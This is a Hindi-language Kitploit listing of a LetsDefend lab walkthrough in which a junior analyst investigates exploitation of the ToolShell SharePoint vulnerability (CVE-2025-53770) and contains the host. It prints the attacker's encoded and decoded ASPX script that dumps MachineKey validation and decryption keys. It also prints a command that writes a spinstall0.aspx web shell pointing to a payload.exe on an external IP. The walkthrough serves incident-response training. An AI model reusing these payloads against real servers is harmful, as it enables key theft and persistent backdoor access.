Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend — LetsDefend प्रयोगशाला में CVE-2025-53770 (ToolShell) के शोषण की चरण-दर-चरण वॉकथ्रू, जिसमें RCE, वेब शेल परिनियोजन, और घटना प्रतिक्रिया विश्लेषण शामिल है। | Kitploit
उपकरण/GitHubGitHub/cyprianatsyor/toolshell-cve-2025-53770-sharepoint-exploit-lab-letsdefend
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणमालवेयर विश्लेषणडिजिटल फोरेंसिकCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
घटना प्रतिक्रिया
पेलोड डेवलपमेंट
लैब और अभ्यास
GitHubcyprianatsyor/toolshell-cve-2025-53770-sharepoint-exploit-lab-letsdefend

ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend

LetsDefend प्रयोगशाला में CVE-2025-53770 (ToolShell) के शोषण की चरण-दर-चरण वॉकथ्रू, जिसमें RCE, वेब शेल परिनियोजन, और घटना प्रतिक्रिया विश्लेषण शामिल है।

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend

TL;DR अरे, इस LetsDefend लैब में मैंने ToolShell (CVE-2025-53770) नामक SharePoint जीरो-डे का गहराई से अध्ययन किया। मूलतः, मैंने एक वास्तविक-दुनिया के हमले का अनुकरण किया जहाँ एक दुर्भावनापूर्ण POST अनुरोध ने प्रमाणीकरण को बायपास किया, MachineKeySection कुंजियाँ चुराने के लिए PowerShell चलाया, payload.exe संकलित किया, और एक वेब शेल (spinstall0.aspx) गिरा दिया। मैंने सब कुछ लॉग किया, व्यवहार का विश्लेषण किया, और होस्ट को कंटेन किया। यह README हमले, मेरे कदमों और सीखे गए सबक को कवर करता है।

Lab Overview

  • Platform: LetsDefend Cyber Range
  • Target: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • Objective: RCE का विश्लेषण करना, पता लगाने और नियंत्रण का अभ्यास करना

Tools Used:

Windows PowerShell

VirusTotal

AbuseIPDB

LetsDefend Log Management

LetsDefend Enpoint Security

LetsDefend Threat Intel


Alert Image Detail

Alert Image Detail

EventID : 320

Event Time : Jul, 22, 2025, 01:07 PM

Rule : SOC342 - CVE‑2025‑53770 SharePoint ToolShell Auth Bypass and RCE

Level : Security Analyst

Hostname : SharePoint01

Source IP Address : 107.191.58.76

Destination IP Address : 172.16.20.17

HTTP Request Method : POST

Requested URL : /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0

Referer : /_layouts/SignOut.aspx

Content-Length : 7699

Alert Trigger Reason : Suspicious unauthenticated POST request targeting ToolPane.aspx with large payload size and spoofed referer indicative of CVE-2025-53770 exploitation.

Device Action : Allowed


Overview 22 जुलाई, 2025 को, हमारी सुरक्षा निगरानी ने SharePoint01 नामक ऑन-प्रिमाइसेस SharePoint सर्वर इंस्टेंस पर एक गंभीर जीरो-डे हमले को फ्लैग किया।

CVE Details:

  • CVE ID: CVE-2025-53770
  • Severity: Critical (CVSS 9.8)
  • Exploit Type: Remote Code Execution (RCE) via deserialization vulnerability
  • Disclosure: सार्वजनिक रूप से ज्ञात 19 जुलाई, 2025
  • Patch Released: 20–21 जुलाई, 2025

CISA KEV Catalog: प्रविष्टि 20 जुलाई, 2025 को प्रकाशित

Attack Vector: POST request to /ToolPane.aspx endpoint, spoofed referer header, large malicious payload

Source: IP 107.191.58.76, Vultr Holdings, LLC, USA


About SharePoint Microsoft SharePoint एंटरप्राइज सहयोग और दस्तावेज़ प्रबंधन की रीढ़ है। यह अनिवार्य रूप से फ़ाइलों, वर्कफ़्लो और आंतरिक ऐप्स के लिए एक सुरक्षित, संगठित क्लाउड-जैसी जगह है।

Core Uses:

Document Management: संस्करण नियंत्रण, ऑडिट ट्रेल, फ़ाइल नियंत्रण

Collaboration: एकाधिक उपयोगकर्ता एक साथ एक ही दस्तावेज़ संपादित कर रहे हैं

Internal Web Portals: समाचार, अपडेट, HR जानकारी, नीतियाँ

Automated Workflows: अनुमोदन, फॉर्म, अधिसूचनाएं

Integration: Teams, Outlook, Office Suite, Power BI से गहराई से जुड़ा हुआ

Security Considerations:

Authentication: AD या SSO

Encryption: डेटा आराम और ट्रांज़िट में

Web Parts & Layouts: यदि गलत तरीके से कॉन्फ़िगर किया गया है तो इसका शोषण किया जा सकता है

Patch Management: जीरो-डे हमलों को रोकने के लिए महत्वपूर्ण


CVE-2025-53770 क्या है?---

CVE-2025-53770, जिसे ToolShell भी कहा जाता है, एक SharePoint जीरो-डे है जिसका जंगली में शोषण किया गया है। यह ऑन-प्रिमाइसेस Microsoft SharePoint सर्वरों में एक गंभीर डिसीरियलाइज़ेशन भेद्यता है जो अप्रमाणित रिमोट कोड निष्पादन (RCE) की अनुमति देती है। यह अन्य SharePoint दोषों (CVE-2025-49704 और CVE-2025-49706) के साथ श्रृंखलित होता है ताकि सिस्टम से पूरी तरह समझौता किया जा सके। इसका CVSS स्कोर 9.8 है, जिसका अर्थ है कि यह गंभीर है।

हमलावर क्या कर रहे हैं?---

वे spinstall0.aspx जैसे दुर्भावनापूर्ण वेब शेल को ToolPane.aspx एंडपॉइंट के माध्यम से अपलोड करते हैं, प्रमाणीकरण को बायपास करने के लिए स्पूफ किए गए रेफरर हेडर का उपयोग करते हैं।

वे पहुंच को बनाए रखने के लिए विश्वसनीय ViewState पेलोड उत्पन्न करने के लिए SharePoint कॉन्फ़िग से महत्वपूर्ण MachineKey मान निकालते हैं।

और बाद में रैनसमवेयर (जैसे, "Warlock" स्ट्रेन) तैनात करते हैं या क्रेडेंशियल्स निकालते हैं और बैकडोर सेट करते हैं।

पहला सार्वजनिक खुलासा: 19 जुलाई, 2025 (Microsoft ब्लॉग)

पैच जारी: 20–21 जुलाई, 2025

CISA के KEV कैटलॉग में प्रवेश: 20 जुलाई, 2025


Attack Analysis

प्रेषक के IP पते (Source IP Address) का VirusTotal पर विश्लेषण किया

Source IP Address : 107.191.58.76

Result form VirusTotal

इससे मुझे पता चल गया कि IP दुर्भावनापूर्ण है

अब मुझे AbuseIPDB की मदद से IP का स्थान खोजना है

AbuseIPDB

मुझे यह मिला :

ISP Vultr Holdings, LLC

Usage Type - Data Center/Web Hosting/Transit

ASN - AS20473

Hostname(s) - 107.191.58.76.vultrusercontent.com

Domain Name - vultr.com

Country - संयुक्त राज्य अमेरिका

City - लॉस एंजिल्स, कैलिफोर्निया

IP हैकिंग, ब्रूट-फोर्स, वेब ऐप अटैक, पोर्ट स्कैन, DNS पॉइज़निंग के लिए जाना जाता है


एक जूनियर विश्लेषक के रूप में इसे हल करना मैंने यह कैसे किया पहले मैंने एंडपॉइंट सुरक्षा पर "SharePoint01" नाम से होस्ट की खोज की।

Endpoint Security

होस्ट का पता लगाने के बाद, मैं टर्मिनल हिस्ट्री में गया, मुझे एक कमांड लाइन मिली

root@kitploit:~

Command Line Code

कमांड में क्या हो रहा है?

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" → सिस्टम डायरेक्टरी से सीधे PowerShell लॉन्च करता है।

-nop

→ कोई प्रोफ़ाइल नहीं — पहचान या हस्तक्षेप से बचने के लिए PowerShell प्रोफ़ाइल स्क्रिप्ट को अनदेखा करता है।

-w hidden

→ एक छिपी हुई विंडो के साथ चलता है ताकि उपयोगकर्ता इसे न देख सके।

-e

आइए इसे डिकोड करें

root@kitploit:~
"PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg=="

चरण 1: रिकॉन और पेलोड कैप्चर

/ToolPane.aspx पर POST अनुरोध कैप्चर किया: POST /_layouts/15/ToolPane.aspx HTTP/1.1 Host: sharepoint01.lab Content-Type: application/x-www-form-urlencoded Content-Length: 1452 Referer: http://sharepoint01.lab/_layouts/15/settings.aspx User-Agent: Mozilla/5.0 Payload=BASE64_ENCODED_POWERSHELL_PAYLOAD_HERE

Method: POST request to /ToolPane.aspx bypassing authentication

Payload: बड़ी, अस्पष्ट, Base64-एन्कोडेड PowerShell स्क्रिप्ट

Referer Header: उत्पत्ति छिपाने के लिए स्पूफ किया गया

चरण 2: निष्पादन और शोषण:

मैंने Base64 डिकोडर में स्क्रिप्ट/पेलोड को डिकोड किया

base64 से डिकोड करने पर यह मिला

root@kitploit:~
"<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">

&nbsp;   public void Page\_load()

&nbsp;   {

&nbsp;		var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");

&nbsp;       var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");

&nbsp;       var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);

&nbsp;       var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object\[0]);

&nbsp;       Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);

&nbsp;   } 

डिकोड किया गया कमांड

मुझे समझाने दें कि उपरोक्त स्क्रिप्ट क्या करती है

यह आयात करता है:

-System.Diagnostics

-System.IO

⦁ और फिर PowerShell के अंदर एक C# इनलाइन स्क्रिप्ट चलाता है जो:

-System.Web असेंबली लोड करता है

-System.Web.Configuration.MachineKeySection तक पहुँचता है

-मशीन के web.config से सत्यापन और डिक्रिप्शन कुंजियाँ पुनर्प्राप्त करता है

-फिर उन्हें प्रतिक्रिया में लिखता है, संभवतः उन्हें हमलावर को निकालने के लिए

हमलावर ने आगे यह कमांड भेजना जारी रखा

root@kitploit:~
""C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs"

-csc.exe - .NET फ्रेमवर्क के साथ एक C# कंपाइलर

-फिर कंपाइलर को इस "payload.exe" को होस्ट पर सहेजने का निर्देश देता है

यह पेलोड मैलवेयर हो सकता है

हमलावर द्वारा अगली कमांड लाइन

root@kitploit:~
""C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"

यह क्या करता है

"C:\Windows\System32\cmd.exe" /c - निम्नलिखित कमांड को कमांड प्रॉम्प्ट में चलाता है और फिर समाप्त करता है।

echo <form runat=\"server\"> ... </form>- ASP.NET मार्कअप का एक छोटा सा टुकड़ा लिखता है जो SharePoint सर्वर पर चलेगा।

मार्कअप में शामिल है: <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"> - यह CLSID शेल ActiveX नियंत्रण है (IE/COM संदर्भ में शेल कमांड चलाने या विशेष क्रियाएं करने के लिए उपयोग किया जाता है)।

<param name="Command" value="Redirect"> - यह ऑब्जेक्ट को बताता है कि क्या कार्रवाई करनी है।

<param name="Url" value="http://107.191.58.76/payload.exe"> - एक दूरस्थ सर्वर पर होस्ट किए गए दुर्भावनापूर्ण EXE की ओर इशारा करता है — बहुत संभवतः उनका वास्तविक मैलवेयर।

हमलावर द्वारा अगली कमांड लाइन

root@kitploit:~
""C:\Windows\System32\cmd.exe" /c echo <form runat=\"server\"> <object classid=\"clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\"><param name=\"Command\" value=\"Redirect\"> <param name=\"Button\" value=\"Test\"> <param name=\"Url\" value=\"http://107.191.58.76/payload.exe\"></object></form> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"

फिर से यह क्या करता है:

"C:\Windows\System32\cmd.exe" /c - निम्नलिखित कमांड को कमांड प्रॉम्प्ट में चलाता है और फिर समाप्त करता है।

echo <form runat=\"server\"> ... </form> - ASP.NET मार्कअप का एक छोटा सा टुकड़ा लिखता है जो SharePoint सर्वर पर चलेगा।

और भी

मार्कअप में शामिल है:

root@kitploit:~
<object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
यह CLSID शेल ActiveX नियंत्रण है (IE/COM संदर्भ में शेल कमांड चलाने या विशेष क्रियाएं करने के लिए उपयोग किया जाता है)।

<param name="Command" value="Redirect">- यह ऑब्जेक्ट को बताता है कि क्या कार्रवाई करनी है।

<param name="Url" value="http://107.191.58.76/payload.exe"> - एक दूरस्थ सर्वर पर होस्ट किए गए दुर्भावनापूर्ण EXE की ओर इशारा करता है — बहुत संभवतः उनका वास्तविक मैलवेयर।

> C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx - उस संपूर्ण दुर्भावनापूर्ण HTML/ASP.NET ऑब्जेक्ट को SharePoint के layouts फ़ोल्डर के अंदर spinstall0.aspx के रूप में सहेजता है।

इस फ़ोल्डर में किसी भी चीज़ को SharePoint साइट पर सही URL ब्राउज़ करके एक्सेस किया जा सकता है, जिसका अर्थ है कि हमलावर के पास अब आपके सर्वर पर एक वेब पेज है जो दुर्भावनापूर्ण कार्रवाई को ट्रिगर करता है।

मुझे जो कमांड लाइन मिली, वे नीचे हैं:

Command line 2

Command line 3


यह पुष्टि करने के बाद कि यह जोखिम भरा है, मैं होस्ट पर प्रक्रियाओं का पता लगाने गया।

संदिग्ध लग रहा है, फ़ाइल पथों और exe से भरा हुआ

सिर्फ जिज्ञासा के लिए, मैं लॉग प्रबंधन में गया और लॉग में दुर्भावनापूर्ण IP खोजा।

एक पोस्ट अनुरोध के साथ एक कच्चा लॉग देखा

root@kitploit:~

एक रेफ़रर के साथ - /_layouts/SignOut.aspx

मैं जाँचने गया कि क्या हमला सफल रहा।

आप जानते हैं क्या? यह सफल था, इसलिए अब मुझे इसे SOC2 के लिए कंटेन करना होगा

यह मेरा विश्लेषक नोट है:

हमने SharePoint01 नामक ऑन-प्रिमाइसेस SharePoint सर्वर में ToolShell (CVE-2025-53770) नामक जीरो-डे भेद्यता का शोषण करने वाले एक गंभीर हमले का पता लगाया। हमलावर ने एक ज्ञात दुर्भावनापूर्ण IP (107.191.58.76) से SharePoint एंडपॉइंट (ToolPane.aspx) पर एक बड़े पेलोड के साथ एक अप्रमाणित POST अनुरोध भेजा, प्रमाणीकरण को बायपास करके सर्वर पर रिमोट कोड चलाया।

गहराई से जांच करने पर, हमलावर ने छिपी हुई PowerShell कमांड चलाई जिसने संवेदनशील SharePoint MachineKey मान चुराने के लिए base64 स्क्रिप्ट को डिकोड किया, जिससे उन्हें विश्वसनीय पेलोड तैयार करने की अनुमति मिली। उन्होंने होस्ट पर एक दुर्भावनापूर्ण निष्पादन योग्य संकलित किया, फिर SharePoint के layouts फ़ोल्डर में एक वेब शेल (spinstall0.aspx) लगाया जो उनके सर्वर से मैलवेयर डाउनलोड और चलाता है, जिससे स्थायी बैकडोर पहुँच मिलती है।

समझौते की पुष्टि करने के बाद, हमने प्रभावित होस्ट को कंटेन किया और तत्काल पैचिंग की सिफारिश की क्योंकि कुछ दिन पहले ही फिक्स जारी किए गए थे। हम अन्य वेब शेल के लिए स्कैन भी कर रहे हैं, रैनसमवेयर या डेटा चोरी के लिए निगरानी कर रहे हैं, और आगे की क्षति को रोकने के लिए SharePoint सर्वर के आसपास कड़ी सुरक्षा की सलाह दे रहे हैं।


और टीम के लिए नोट:

टीम को नोट: अरे टीम, हमने अपने SharePoint सर्वर (SharePoint01) पर ToolShell जीरो-डे (CVE-2025-53770) के एक गंभीर शोषण का पता लगाया है। एक हमलावर ने प्रमाणीकरण को बायपास करने और रिमोट कोड निष्पादित करने के लिए एक अप्रमाणित POST अनुरोध का उपयोग किया, जो ToolPane.aspx को लक्षित करने वाले एक बड़े संदिग्ध पेलोड से शुरू हुआ।

हमलावर ने संवेदनशील SharePoint मशीन कुंजियाँ चुराने के लिए छिपी हुई PowerShell कमांड चलाई, फिर सिस्टम पर एक दुर्भावनापूर्ण निष्पादन योग्य संकलित और गिरा दिया। उन्होंने SharePoint layouts फ़ोल्डर में एक वेब शेल (spinstall0.aspx) भी बनाया, जो एक बाहरी सर्वर से मैलवेयर डाउनलोड और चलाता है, संभावित रूप से उन्हें स्थायी नियंत्रण देता है।

हमने समझौता किए गए होस्ट को कंटेन कर लिया है और तत्काल पैचिंग की सलाह देते हैं क्योंकि फिक्स अभी जारी किए गए हैं। हम समान वेब शेल के लिए भी स्कैन कर रहे हैं और रैनसमवेयर या डेटा एक्सफिल्ट्रेशन के संकेतों पर नज़र रख रहे हैं। आइए सतर्क रहें और आगे बढ़ते हुए SharePoint सुरक्षा को मजबूत करें।

हमने कर दिखाया

यह मेरा परिणाम है

Result on LetsDend

टूल डाउनलोड करें